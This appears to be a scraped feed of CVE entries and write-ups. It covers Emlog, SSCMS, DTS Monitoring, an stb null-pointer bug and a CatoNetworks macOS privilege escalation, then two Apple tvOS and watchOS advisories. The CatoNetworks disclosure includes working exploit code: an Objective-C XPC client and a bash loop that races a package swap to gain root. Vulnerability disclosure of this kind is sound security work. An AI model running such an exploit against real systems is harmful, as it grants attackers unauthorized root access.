An arbitrary file upload vulnerability in the component /content/templates/ of Emlog Pro v2.2.0 allows attackers to execute arbitrary code via uploading a crafted PHP file.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-44973: emlog/Template-getshell.md at main · yangliukk/emlog

SSCMS 7.2.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Content Management component.

CVE-2023-43953: Security-Advisories/CVE-2023-43953 at main · M19O/Security-Advisories

SSCMS 7.2.2 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Material Management component.

CVE-2023-43952: Security-Advisories/CVE-2023-43952 at main · M19O/Security-Advisories

SSCMS 7.2.2 was discovered to contain a cross-site scripting (XSS) vulnerability via the Column Management component.

CVE-2023-43951: Security-Advisories/CVE-2023-43951 at main · M19O/Security-Advisories

Nothings stb 2.28 was discovered to contain a Null Pointer Dereference via the function stbi__convert_format. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted pic file.

**Null Pointer Dereference vulnerability in nothings/stb**

​ Nothings/stb, an image processing library, has a **Null Pointer Dereference** vulnerability in the stbi\_\_convert\_format function, stb\_image.h 2.28(https://github.com/nothings/stb/blob/master/stb\_image.h). This function is called in stbi\_\_pic\_load and is used to parse files in the pic image format. And stbi\_\_pic\_load is called by stbi\_load\_from\_memory.

**Vulnerability causes**

static void \*stbi\_\_pic\_load(stbi\_\_context \*s,int \*px,int \*py,int \*comp,int req\_comp, stbi\_\_result\_info \*ri)
{
   stbi\_uc \*result;
   int i, x,y, internal\_comp;
   STBI\_NOTUSED(ri);

   if (!comp) comp = &internal\_comp;

   for (i=0; i<92; ++i)
      stbi\_\_get8(s);

   x = stbi\_\_get16be(s);
   y = stbi\_\_get16be(s);

   if (y > STBI\_MAX\_DIMENSIONS) return stbi\_\_errpuc("too large","Very large image (corrupt?)");
   if (x > STBI\_MAX\_DIMENSIONS) return stbi\_\_errpuc("too large","Very large image (corrupt?)");

   if (stbi\_\_at\_eof(s))  return stbi\_\_errpuc("bad file","file too short (pic header)");
   if (!stbi\_\_mad3sizes\_valid(x, y, 4, 0)) return stbi\_\_errpuc("too large", "PIC image too large to decode");

   stbi\_\_get32be(s); //skip \`ratio'
   stbi\_\_get16be(s); //skip \`fields'
   stbi\_\_get16be(s); //skip \`pad'

   // intermediate buffer is RGBA
   result = (stbi\_uc \*) stbi\_\_malloc\_mad3(x, y, 4, 0);
   if (!result) return stbi\_\_errpuc("outofmem", "Out of memory");
   memset(result, 0xff, x\*y\*4);

   if (!stbi\_\_pic\_load\_core(s,x,y,comp, result)) {
      STBI\_FREE(result);
      result=0;
   }
   \*px = x;
   \*py = y;
   if (req\_comp == 0) req\_comp = \*comp;
   result=stbi\_\_convert\_format(result,4,req\_comp,x,y);

   return result;
}

​ We can see that the "**result**" variable is assigned NULL after STBI\_FREE and is used again by stbi\_\_convert\_format.

static unsigned char \*stbi\_\_convert\_format(unsigned char \*data, int img\_n, int req\_comp, unsigned int x, unsigned int y)
{
   int i,j;
   unsigned char \*good;

   if (req\_comp == img\_n) return data;
   STBI\_ASSERT(req\_comp >= 1 && req\_comp <= 4);

   good = (unsigned char \*) stbi\_\_malloc\_mad3(req\_comp, x, y, 0);
   if (good == NULL) {
      STBI\_FREE(data);
      return stbi\_\_errpuc("outofmem", "Out of memory");
   }

   for (j=0; j < (int) y; ++j) {
      unsigned char \*src  = data + j \* x \* img\_n   ;
      unsigned char \*dest = good + j \* x \* req\_comp;

      #define STBI\_\_COMBO(a,b)  ((a)\*8+(b))
      #define STBI\_\_CASE(a,b)   case STBI\_\_COMBO(a,b): for(i=x-1; i >= 0; --i, src += a, dest += b)
      // convert source image with img\_n components to one with req\_comp components;
      // avoid switch per pixel, so use switch per scanline and massive macros
      switch (STBI\_\_COMBO(img\_n, req\_comp)) {
         STBI\_\_CASE(1,2) { dest\[0\]=src\[0\]; dest\[1\]=255;                                     } break;
         STBI\_\_CASE(1,3) { dest\[0\]=dest\[1\]=dest\[2\]=src\[0\];                                  } break;
         STBI\_\_CASE(1,4) { dest\[0\]=dest\[1\]=dest\[2\]=src\[0\]; dest\[3\]=255;                     } break;
         STBI\_\_CASE(2,1) { dest\[0\]=src\[0\];                                                  } break;
         STBI\_\_CASE(2,3) { dest\[0\]=dest\[1\]=dest\[2\]=src\[0\];                                  } break;
         STBI\_\_CASE(2,4) { dest\[0\]=dest\[1\]=dest\[2\]=src\[0\]; dest\[3\]=src\[1\];                  } break;
         STBI\_\_CASE(3,4) { dest\[0\]=src\[0\];dest\[1\]=src\[1\];dest\[2\]=src\[2\];dest\[3\]=255;        } break;
         STBI\_\_CASE(3,1) { dest\[0\]=stbi\_\_compute\_y(src\[0\],src\[1\],src\[2\]);                   } break;
         STBI\_\_CASE(3,2) { dest\[0\]=stbi\_\_compute\_y(src\[0\],src\[1\],src\[2\]); dest\[1\] = 255;    } break;
         STBI\_\_CASE(4,1) { dest\[0\]=stbi\_\_compute\_y(src\[0\],src\[1\],src\[2\]);                   } break;
         STBI\_\_CASE(4,2) { dest\[0\]=stbi\_\_compute\_y(src\[0\],src\[1\],src\[2\]); dest\[1\] = src\[3\]; } break;
         STBI\_\_CASE(4,3) { dest\[0\]=src\[0\];dest\[1\]=src\[1\];dest\[2\]=src\[2\];                    } break;
         default: STBI\_ASSERT(0); STBI\_FREE(data); STBI\_FREE(good); return stbi\_\_errpuc("unsupported", "Unsupported format conversion");
      }
      #undef STBI\_\_CASE
   }

   STBI\_FREE(data);
   return good;
}

​ The "**result**" variable will be used again as the "**data**" variable inside stbi\_\_convert\_format, when the "**data**" variable is already a null pointer, and using it again will result in a null pointer dereference.

**Vulnerability reproduce**

​ The environment is shown below.

​ In the "null\_example" folder, use the following command.

​ or

​ We can see the "core dumped".

**Impact**

Denial of service attack

​ Here the "**result**" variable is assigned as a null pointer.

​ Here the null pointer is used as the base address, at which point an error occurs.

CVE-2023-43898: GitHub - peccc/null-stb

An issue was discovered in DTS Monitoring 3.57.0. The parameter url within the WGET check function is vulnerable to OS command injection (blind).

CVE-2023-33273: CVE-Disclosures/CVE-2023-33273.md at main · l4rRyxz/CVE-Disclosures

An issue was discovered in DTS Monitoring 3.57.0. The parameter ip within the Ping check function is vulnerable to OS command injection (blind).

CVE-2023-33272: CVE-Disclosures/CVE-2023-33272.md at main · l4rRyxz/CVE-Disclosures

An issue in CatoNetworks CatoClient before v.5.4.0 allows attackers to escalate privileges and winning the race condition (TOCTOU) via the PrivilegedHelperTool component.

**Introduction**

A couple of months ago, I have found Local Privilege Escalation vulnerability inside of CatoNetworks macOS application which is fixed in the version 5.4.0. We will see how to exploit the simple race condition in order to achieve escalation of privileges to _root_ user.

**Analysis**

After examining ~/Library/LaunchDaemons/com.catonetworks.mac.CatoClient.helper.plist we can see that the Mach service name is com.catonetworks.mac.client.daemon and the binary it runs is /Library/Application Support/CatoNetworks/com.catonetworks.mac.CatoClient.helper. We will take a note of the Mach service name because we will need it to communicate with the XPC service.

After we have obtained some limited information, we need to load the main binary in _Hopper_ to analyze what is happening and to check whether there are any vulnerabilities.

Searching for listener:shouldAcceptNewConnection revealed that the exported protocol is _TtP38com_catonetworks_mac_CatoClient_helper15CommandProtocol_.

Running class dump showed that this protocol contains a single method - (void)installPackageAtPath:(NSString *)arg1 withCompletion:(void (^)(BOOL))arg2;.

Based on the name, we can conclude that we need to provide the path to the .pkg file and we can check whether we have succeeded or not based on the reply block.

If we now search for implementation of this method, we can see that it calls function sub_100002b7c.

Analyzing the sub_100002b7c function, we can see that it checks whether sub_1000027b0 returned successfully, followed by creation of NSTask (to run programs).

Near the end of the function, there is another check which confirms whether probably the output of the run NSTask contains \norigin=Developer ID Installer: Cato Networks Ltd (CKGSB8CH43).

We will now create a minimal objc code to communicate with the service, and we will examine the arguments passed to -[NSTask setLaunchPath:] and -[NSTask setArguments:] methods with debugger (lldb).

The objc code:

    // gcc cato.m -o cato -framework Foundation
    #import <Foundation/Foundation.h>
    
    static NSString * serviceName = @"com.catonetworks.mac.client.daemon";
    
    @protocol _TtP38com_catonetworks_mac_CatoClient_helper15CommandProtocol_
    - (void)installPackageAtPath:(NSString *)arg1 withCompletion:(void (^)(BOOL))arg2;
    @end
    
    int main(int argc, const char **argv) {
        NSXPCConnection * conn = [[NSXPCConnection alloc] initWithMachServiceName:serviceName options:4096];
    
        [conn setRemoteObjectInterface:[NSXPCInterface interfaceWithProtocol:@protocol(_TtP38com_catonetworks_mac_CatoClient_helper15CommandProtocol_)]];
        [conn resume];
    
        id obj = [conn remoteObjectProxyWithErrorHandler:^(NSError * error) {
               NSLog(@"Error: %@", error);
        }];
    
        NSString * pkgPath = [NSString stringWithCString:argv[1] encoding:NSASCIIStringEncoding];
    
        [obj installPackageAtPath:pkgPath withCompletion:^(BOOL succeeded) {
            if (succeeded) {
                NSLog(@"Exploit succeeded; check /tmp/himynameis");
            } else {
                NSLog(@"Exploit failed; please try again");
            }
        }];
    
        dispatch_main();
        return 0;
    }
    

While inside of lldb we want to set the breakpoints and examine the arguments. Compiling the above code and running it as ./cato nsecho gives the following inside of lldb.

From the lldb output we can conclude that the service is calling /usr/sbin/spctl with the arguments -a -vvv -t install PACKAGE_PATH_WE_PROVIDED. spctl is used to check notorization on the pkg files.

Running the exact command on the legitimate CatoNetworks package returns the output which contains the string we found earlier (\norigin=Developer ID Installer: Cato Networks Ltd (CKGSB8CH43)).

So far we now the following:

*   Services uses _TtP38com_catonetworks_mac_CatoClient_helper15CommandProtocol_ protocol
*   We need to call installPackageAtPath:pkgPath withCompletion:
*   Service checks whether the app is notorized by the Cato using spctl
*   Gets installed if the previous check was successful

It seems that there is no way to exploit it, but after running spctl, I have noticed that it doesn’t return immediately, it takes a couple of milliseconds, meaning that we have potential race condition here.

To exploit this, we need to do the following:

*   Run the exploit, providing the path to the legitimate Cato pkg file
*   Wait a bit
*   Replace the legitimate Cato pkg file with the malicious one
*   Local Privilege Escalation

I will just add a simple command in the postinstall scripts which writes the current user to /tmp/himynameis file.

_The exploit bash script:_

    #!/bin/bash
    
    ORIGINAL=/Users/demon/Downloads/CatoClient-2.pkg
    FAKE=/Users/demon/Downloads/exploit.pkg
    TEMP=/tmp/expl.pkg
    
    while [ true ]
    do
        cp "${ORIGINAL}" "${TEMP}"
    
        ./cato "${TEMP}" &
        sleep 0.1
        cp "${FAKE}" "${TEMP}"
        sleep 4
        stat /tmp/himynameis > /dev/null 2>&1 && exit 0
    done

CVE-2023-43976: 2023-43976 - CatoNetworks macOS LPE

Apple Security Advisory 09-26-2023-9 - tvOS 17 addresses bypass, code execution, out of bounds read, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-9 tvOS 17

tvOS 17 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213936.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Airport  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A permissions issue was addressed with improved redaction  
of sensitive information.  
CVE-2023-40384: Adam M.

App Store  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

GPU Drivers  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40391: Antonio Zekic (@antoniozekic) of Dataflow Security

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Photos Storage  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Pro Res  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41063: Certik Skyfall Team

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Simulator  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved checks.  
WebKit Bugzilla: 256551  
CVE-2023-41074: 이준성(Junsung Lee) of Cross Republic and me Li

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 239758  
CVE-2023-35074: Abysslab Dong Jun Kim(@smlijun) and Jong Seong  
Kim(@nevul37)

Additional recognition

Airport  
We would like to acknowledge Adam M., and Noah Roskin-Frazee and  
Professor Jason Lau (ZeroClicks.ai Lab) for their assistance.

AppSandbox  
We would like to acknowledge Kirin (@Pwnrin) for their assistance.

Audio  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Bluetooth  
We would like to acknowledge Jianjun Dai and Guang Gong of 360  
Vulnerability Research Institute for their assistance.

Control Center  
We would like to acknowledge Chester van den Bogaard for their  
assistance.

Kernel  
We would like to acknowledge Bill Marczak of The Citizen Lab at The  
University of Toronto's Munk School and Maddie Stone of Google's Threat  
Analysis Group, 永超 王 for their assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge an anonymous researcher for their  
assistance.

libxslt  
We would like to acknowledge Dohyun Lee (@l33d0hyun) of PK Security,  
OSS-Fuzz, and Ned Williamson of Google Project Zero for their  
assistance.

NSURL  
We would like to acknowledge Zhanpeng Zhao (行之) and 糖豆爸爸(@晴天组织) for  
their assistance.

Photos  
We would like to acknowledge Dawid Pałuska and Kirin (@Pwnrin) for their  
assistance.

Photos Storage  
We would like to acknowledge Wojciech Regula of SecuRing  
(wojciechregula.blog) for their assistance.

Power Services  
We would like to acknowledge Mickey Jin (@patch1t) for their assistance.

Shortcuts  
We would like to acknowledge Alfie Cockell Gwinnett, Christian Basting  
of Bundesamt für Sicherheit in der Informationstechnik, Cristian Dinca  
of "Tudor Vianu" National High School of Computer Science, Romania,  
Giorgos Christodoulidis, Jubaer Alnazi of TRS Group Of Companies,  
KRISHAN KANT DWIVEDI, and Matthew Butler for their assistance.

Software Update  
We would like to acknowledge Omar Siman for their assistance.

Spotlight  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal, and Dawid Pałuska for their  
assistance.

StorageKit  
We would like to acknowledge Mickey Jin (@patch1t) for their  
assistance. 

WebKit  
We would like to acknowledge Khiem Tran, Narendra Bhati From Suma Soft  
Pvt. Ltd, and an anonymous researcher for their assistance.

Wi-Fi  
We would like to acknowledge Wang Yu of Cyberserval for their  
assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmUTSJoACgkQX+5d1TXa  
IvpJvw/+OKqntqggqPkx4TXqH+nCchp4wj3KCjmdtULgoYL2BStw+jXAl9Z/Wnyi  
uhg7YgboJb+jFc2UbYNG/w6Ks4qnh1P/4xwd8KfiGH+u0pblR24DDyNOPA6X+F4c  
CJ2jfagKi7xOM/Djm0mkrkZ1PeiXkx5k4bBLL+I8ckadCZinecn0tZur0gwAzN/y  
e113vKgGJDvVn257inJ063d7d+R4gdDNznMq4Mg5+gtbWoz9OZ6gHiTj+u8jwrlh  
+10ZOBtTHGQ612OptUB2FcyLn439CQhftHlc91L5Am2HsduesB6MBmtiZlfFMaca  
P8Vur6sh/k34roqaWVW2ljvMkqZMJSocTgjzMsVN87itikXT9ua5HbcInnkCMx+A  
8gtOnogY/lsm446Qu0mH0MYAZLSbQ9OYzJor9fax9PV+ysmOGn2SfM2o6DKPXjCE  
74+yFAiv+lo3yrr68SQea/PiDxhMt7+i/Ia7vO5gg1HkqANFc0//KC2pObdGSNu6  
cWJQUcGqOvU/jqnIO9WLXRnSDdXsRGLJ8xXSAYL8M2FdW5Md/tvQ3/p+/6kwXfnq  
cXwM/92G0mx1GFeapToP0NCjUwx4ARCw9d1Y+5keZ4gRaVOJzy/96WKzbc5blVGH  
C5RT/4ty1vpgbCcI8kmDt0WD2nvTnwoNgBaEti/iC3Lzu+M52wA=  
=Zq9i  
-----END PGP SIGNATURE-----

Apple Security Advisory 09-26-2023-9

Apple Security Advisory 09-26-2023-8 - watchOS 10 addresses bypass, code execution, out of bounds read, spoofing, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-09-26-2023-8 watchOS 10

watchOS 10 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213937.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

App Store  
Available for: Apple Watch Series 4 and later  
Impact: A remote attacker may be able to break out of Web Content  
sandbox  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-40448: w0wbox

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40432: Mohamed GHANNAM (@_simo36)  
CVE-2023-41174: Mohamed GHANNAM (@_simo36)  
CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security  
CVE-2023-40412: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: A use-after-free issue was addressed with improved memory  
management.  
CVE-2023-41071: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to disclose kernel memory  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40399: Mohamed GHANNAM (@_simo36)

Apple Neural Engine  
Available for devices with Apple Neural Engine: Apple Watch Series 9 and  
Apple Watch Ultra 2  
Impact: An app may be able to disclose kernel memory  
Description: An out-of-bounds read was addressed with improved input  
validation.  
CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

AuthKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-32361: Csaba Fitzl (@theevilbit) of Offensive Security

Bluetooth  
Available for: Apple Watch Series 4 and later  
Impact: An attacker in physical proximity can cause a limited out of  
bounds write  
Description: The issue was addressed with improved checks.  
CVE-2023-35984: zer0k

bootp  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2023-41065: Adam M., and Noah Roskin-Frazee and Professor Jason Lau  
(ZeroClicks.ai Lab)

CFNetwork  
Available for: Apple Watch Series 4 and later  
Impact: An app may fail to enforce App Transport Security  
Description: The issue was addressed with improved handling of  
protocols.  
CVE-2023-38596: Will Brattain at Trail of Bits

CoreAnimation  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to a denial-of-service  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Dev Tools  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to gain elevated privileges  
Description: This issue was addressed with improved checks.  
CVE-2023-32396: Mickey Jin (@patch1t)

Game Center  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access contacts  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40395: Csaba Fitzl (@theevilbit) of Offensive Security

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker that has already achieved kernel code execution may  
be able to bypass kernel memory mitigations  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive user data  
Description: A permissions issue was addressed with improved validation.  
CVE-2023-40429: Michael (Biscuit) Thomas and 张师傅(@京东蓝军)

libpcap  
Available for: Apple Watch Series 4 and later  
Impact: A remote user may cause an unexpected app termination or  
arbitrary code execution  
Description: This issue was addressed with improved checks.  
CVE-2023-40400: Sei K.

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to delete files for which it does not have  
permission  
Description: A permissions issue was addressed with additional  
restrictions.  
CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access protected user data  
Description: An authorization issue was addressed with improved state  
management.  
CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab  
(xlab.tencent.com)

libxslt  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may disclose sensitive information  
Description: The issue was addressed with improved memory handling.  
CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Maps  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read sensitive location information  
Description: The issue was addressed with improved handling of caches.  
CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing  
(wojciechregula.blog)

MobileStorageMounter  
Available for: Apple Watch Series 4 and later  
Impact: A user may be able to elevate privileges  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2023-41068: Mickey Jin (@patch1t)

Passcode  
Available for: Apple Watch Ultra (all models)  
Impact: An Apple Watch Ultra may not lock when using the Depth app  
Description: An authentication issue was addressed with improved state  
management.  
CVE-2023-40418: serkan Gurbuz

Photos Storage  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access edited photos saved to a temporary  
directory  
Description: The issue was addressed with improved checks.  
CVE-2023-40456: Kirin (@Pwnrin)  
CVE-2023-40520: Kirin (@Pwnrin)

Safari  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to identify what other apps a user has  
installed  
Description: The issue was addressed with improved checks.  
CVE-2023-35990: Adriatik Raci of Sentry Cybersecurity

Safari  
Available for: Apple Watch Series 4 and later  
Impact: Visiting a website that frames malicious content may lead to UI  
spoofing  
Description: A window management issue was addressed with improved state  
management.  
CVE-2023-40417: Narendra Bhati From Suma Soft Pvt. Ltd.

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to overwrite arbitrary files  
Description: The issue was addressed with improved bounds checks.  
CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access sensitive data logged when a user  
shares a link  
Description: A logic issue was addressed with improved checks.  
CVE-2023-41070: Kirin (@Pwnrin)

Simulator  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to gain elevated privileges  
Description: The issue was addressed with improved checks.  
CVE-2023-40419: Arsenii Kostromin (0x3c3e)

StorageKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to read arbitrary files  
Description: This issue was addressed with improved validation of  
symlinks.  
CVE-2023-41968: Mickey Jin (@patch1t) and James Hutchins

TCC  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: The issue was addressed with improved checks.  
CVE-2023-40424: Arsenii Kostromin (0x3c3e), Joshua Jewett  
(@JoshJewett33), and Csaba Fitzl (@theevilbit) of Offensive Security

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: A use-after-free issue was addressed with improved memory  
management.  
